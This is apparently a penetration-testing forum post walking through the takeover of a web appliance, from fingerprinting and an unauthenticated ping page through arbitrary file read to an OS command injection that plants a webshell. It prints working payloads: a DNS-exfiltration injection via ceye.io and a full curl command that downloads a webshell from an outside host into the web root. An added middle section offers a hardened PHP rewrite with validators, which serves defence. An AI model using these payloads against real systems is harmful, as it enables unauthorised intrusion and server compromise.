中国网络渗透测试联盟

Title: Web security in practice: getting a webshell through an OS command injection vulnerability

Author: admin    Time: 2022-3-31 01:39

**1. Finding an entry point**

**Right-clicking to view the page source showed that the system's fingerprint is images/select_bg.png. Searching for it on ZoomEye (钟馗之眼) gives the result shown:**

![image.png](data/attachment/forum/202203/31/013456oll79nxwhwxz9h2l.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")

**Both reporter and [Technology, Inc.](https://www.zoomeye.org/searchRe ... title:%22Technology,%20Inc.%22&t=all) use this fingerprint. I had worked on this kind of system before and had its source code; comparing the target against the source tree turned up an unauthenticated page.**

**The address is:**

[http://1.1.1.1//view/systemConfi ... ;text_packetsize=64](http://1.1.1.1/view/systemConfig ... ;text_packetsize=64)**, as shown:**

![image.png](data/attachment/forum/202203/31/013528hffsyjijhb58lhh5.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")
**Testing the ping function on this page, I found that its normal behaviour can be bypassed to execute commands. The payload is:**

**`` `whoami`.1111.ceye.io ``, as shown:**

![image.png](data/attachment/forum/202203/31/013559bwl0r0lrgkpm8lrw.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")

**The DNS record that came back, as shown:**

![image.png](data/attachment/forum/202203/31/013625ei2ea2ealisblpsb.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")

**This shows that the current user is root.**
**2. Getting a webshell by chaining vulnerabilities**

**This article follows the order in which the bugs were found. Next, run the pwd command to obtain the web path, as shown:**

![image.png](data/attachment/forum/202203/31/013656tl9z2765580yd7t8.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")

**This gives the site path: /var/www/html/view/systemconfig/systemtool/**

**Using Burp Suite at the same time, I found one OS command injection vulnerability and one arbitrary file read vulnerability; the screenshot below shows the arbitrary file read.**

![image.png](data/attachment/forum/202203/31/013726cn3oj66ngggc6zz8.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")

**The OS command injection is in /var/www/html/view/Behavior/toQuery.php. This path was obtained through the command execution from step one (bypassing the ping function's normal behaviour); using the arbitrary file read, we read its source code:**

![image.png](data/attachment/forum/202203/31/013749x0i8ilbkiuelle4e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")
**The source code is:**

```php
<?php
include_once($_SERVER["DOCUMENT_ROOT"]."/model/charFilter.php");
?>

<?php
session_start ();

if ($_GET ["objClass"] == "")
      exit ();

$param = $_REQUEST;

//echo "\n--------------------------\n";
//print_r($param);
//echo "\n--------------------------\n";

if ($_GET ["method"] == "getList" || $_GET ["method"] == "import" || $_GET ["method"] == "processAlarm") {
      $param ["user"] = $_SESSION ["s_userName"];
      $param ["lan"] = $_SESSION ["lan"];
      $param ["regUserpath"] = $_SESSION ["regUserpath"];

      exec ( "rm -rf /tmp/cache" );

      // objClass and method come straight from the query string and are concatenated without escaping
      $cmd = "/usr/local/php/bin/php ".$_SERVER ["DOCUMENT_ROOT"] . "system/behavior/behavior_query.php";
      $cmd .= " " . $_GET ["objClass"];
      $cmd .= " " . $_GET ["method"];
      $cmd .= " " . base64_encode ( json_encode ( $param ) );
      file_put_contents("/tmp/query_cmd",$cmd);
      // the assembled string is handed to a shell: this is the command injection sink
      exec ( $cmd . " > /dev/null &" );
} else {
      require_once ($_SERVER ["DOCUMENT_ROOT"] . "system/behavior/behavior_Detail.php");
      $obj = new QueryInterface ();
      $instance = $obj->getInstance ();
      $instance->invokeMethod ( $_GET ["objClass"], $_GET ["method"], $param );
}
exit ();
?>
```
**A quick audit shows the check `if ($_GET ["method"] == "getList" || $_GET ["method"] == "import" || $_GET ["method"] == "processAlarm")`: as long as method equals one of getList, import or processAlarm, the code sets `$cmd = "/usr/local/php/bin/php ".$_SERVER ["DOCUMENT_ROOT"] . "system/behavior/behavior_query.php";`, that is, cmd is the web absolute path + system/behavior/behavior_query.php, then appends `$_GET ["objClass"]` and `$_GET ["method"]` separated by spaces with no escaping, writes the result with `file_put_contents("/tmp/query_cmd",$cmd);` and runs**

**`exec ( $cmd . " > /dev/null &" );`** **through the shell. That hands us a parameter for command injection and is a straightforward OS command injection vulnerability. Here is my demonstration:**

![image.png](data/attachment/forum/202203/31/013842ceg7htegblnr4nnk.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")
**In the screenshot, objClass= is where the OS command injection is. I had tried to get a bash reverse shell earlier, but after a whole night of testing it never connected back, so in the end I chose to download the webshell with curl. The payload is:**

```
%7Ccurl%20http%3A%2F%2F1.1.1.1%2FqYCwxRz1.zip%20-o%20%2Fvar%2Fwww%2Fhtml%2Fimages%2Fsuiji2.php%7C%7C%60pcurl%20http%3A%2F%2F1.1.1.1%2FqYCwxRz1.zip%20-o%20%2Fvar%2Fwww%2Fhtml%2Fimages%2Fsuiji2.php%60%20%23%27%20%7Ccurl%20http%3A%2F%2F1.1.1.1%2FqYCwxRz1.zip%20-o%20%2Fvar%2Fwww%2Fhtml%2Fimages%2Fsuiji2.php%7C%7C%60curl%20http%3A%2F%2F1.1.1.1%2FqYCwxRz1.zip%20-o%20%2Fvar%2Fwww%2Fhtml%2Fimages%2Fsuiji2.php%60%20%23%5C%22%20%7Ccurl%20http%3A%2F%2F1.1.1.1%2FqYCwxRz1.zip%20-o%20%2Fvar%2Fwww%2Fhtml%2Fimages%2Fsuiji2.php
```

**URL-decoded, it reads:**

```
|curl http://1.1.1.1/qYCwxRz1.zip -o /var/www/html/images/suiji2.php||`pcurl http://1.1.1.1/qYCwxRz1.zip -o /var/www/html/images/suiji2.php` #' |curl http://1.1.1.1/qYCwxRz1.zip -o /var/www/html/images/suiji2.php||`curl http://1.1.1.1/qYCwxRz1.zip -o /var/www/html/images/suiji2.php` #\" |curl http://1.1.1.1/qYCwxRz1.zip -o /var/www/html/images/suiji2.php
```
**The reason for using so many pipe characters | is to close off the payload. In the end the webshell was downloaded successfully with curl, as shown:**

![image.png](data/attachment/forum/202203/31/013922zdonl51onkonxqqz.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")
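The sink audited above takes objClass and method straight from the query string into exec(), and the ping page from section 1 passes its host parameter to the shell the same way. As an added example (not from the original post and not the vendor's code), here is how that sink could be rewritten so that every value reaching the shell is first checked against a strict grammar and then escaped, with a validator for the ping page's host parameter alongside it. The helper names (stringParam, validateObjClass, validateMethod, validatePingTarget, buildQueryCommand), the 403/400 responses and the assumption that DOCUMENT_ROOT and the behavior_query.php worker path are unchanged are mine; the QueryInterface branch is left out because it never touches the shell.

```php
<?php
// Added example, not the vendor's code and not from the original post: a hardened
// rewrite of the exec() path in toQuery.php plus a validator for the ping page's
// host parameter. Helper names and the error responses are assumptions.

declare(strict_types=1);

const ALLOWED_METHODS = ['getList', 'import', 'processAlarm'];

/** Return a query parameter as a string, or null if it is absent or not a scalar. */
function stringParam(array $source, string $name): ?string
{
    $value = $source[$name] ?? null;
    return is_string($value) ? $value : null;
}

/**
 * objClass is an identifier, so only identifier characters are accepted.
 * |, ||, `, $( ), ; and quotes (everything the post's payload relies on) fail here.
 */
function validateObjClass(?string $objClass): ?string
{
    if ($objClass === null || preg_match('/^[A-Za-z0-9_]{1,64}$/', $objClass) !== 1) {
        return null;
    }
    return $objClass;
}

/** method is matched against a fixed allow-list instead of being echoed into the command. */
function validateMethod(?string $method): ?string
{
    return ($method !== null && in_array($method, ALLOWED_METHODS, true)) ? $method : null;
}

/**
 * For the ping page: accept only a literal IP address or an RFC 1123 hostname.
 * A value such as `whoami`.1111.ceye.io contains backticks and is rejected
 * before any shell is involved.
 */
function validatePingTarget(?string $host): ?string
{
    if ($host === null) {
        return null;
    }
    if (filter_var($host, FILTER_VALIDATE_IP) !== false) {
        return $host;
    }
    $label = '[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?';
    return preg_match('/^(?=.{1,253}$)(?:' . $label . '\.)*' . $label . '$/', $host) === 1 ? $host : null;
}

/**
 * Build the worker command. Validation is the primary control; escapeshellarg()
 * is a second layer so that even a future relaxation of the regex cannot turn a
 * parameter into shell syntax. The base64 blob is escaped for the same reason.
 */
function buildQueryCommand(string $docRoot, string $objClass, string $method, array $param): string
{
    $script = rtrim($docRoot, '/') . '/system/behavior/behavior_query.php';
    return '/usr/local/php/bin/php ' . escapeshellarg($script)
        . ' ' . escapeshellarg($objClass)
        . ' ' . escapeshellarg($method)
        . ' ' . escapeshellarg(base64_encode(json_encode($param)));
}

// Request handling, mirroring the original control flow for the shell branch.
if (PHP_SAPI !== 'cli') {
    session_start();
    if (empty($_SESSION['s_userName'])) {   // the listed code never checked the session
        http_response_code(403);
        exit();
    }

    $objClass = validateObjClass(stringParam($_GET, 'objClass'));
    $method   = validateMethod(stringParam($_GET, 'method'));
    if ($objClass === null || $method === null) {
        error_log('toQuery: rejected objClass/method from ' . ($_SERVER['REMOTE_ADDR'] ?? '?'));
        http_response_code(400);
        exit();
    }

    $param = $_REQUEST;
    $param['user']        = $_SESSION['s_userName'];
    $param['lan']         = $_SESSION['lan'] ?? '';
    $param['regUserpath'] = $_SESSION['regUserpath'] ?? '';

    $cmd = buildQueryCommand($_SERVER['DOCUMENT_ROOT'], $objClass, $method, $param);
    exec($cmd . ' > /dev/null 2>&1 &');
    exit();
}

// Run from the command line, the script only exercises the validators on the
// post's own payloads (constructed calls; no shell is involved).
var_dump(validateObjClass('|curl http://1.1.1.1/qYCwxRz1.zip -o /var/www/html/images/suiji2.php'));
var_dump(validateObjClass('Alarm'));
var_dump(validateMethod('getList'), validateMethod('getList;id'));
var_dump(validatePingTarget('`whoami`.1111.ceye.io'), validatePingTarget('1.1.1.1'));
```

Run with `php toQuery_hardened.php` the four var_dump calls return NULL for the curl payload, "Alarm" for a plain identifier, "getList" and NULL for the two method values, and NULL and "1.1.1.1" for the two ping targets. The rejected-request log line is the piece a SOC would alert on: a 400 from toQuery.php with a non-identifier objClass is exactly the traffic the post describes.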
**3. Summary**

**The reason this case ended in a webshell was largely the combination of several vulnerabilities. First, right-clicking to view the source identified which system the target runs, because I had previously tested a program similar to it. Then, treating the symptom directly, I found the unauthenticated ping page, bypassed the ping command's normal function to run pwd, and obtained the site's absolute path. Next, the arbitrary file read was used to fetch the PHP file suspected of OS command execution for a quick audit, which confirmed the vulnerability. Finally, the OS command execution payload was constructed and the webshell obtained. The whole process is a chain of vulnerabilities; penetration testing often comes down to luck, and if any one of these links had been missing or had not been found, getting the webshell could have failed.**

**In short, luck and bug-hunting skill matter equally. Thanks for reading!**




Welcome to 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2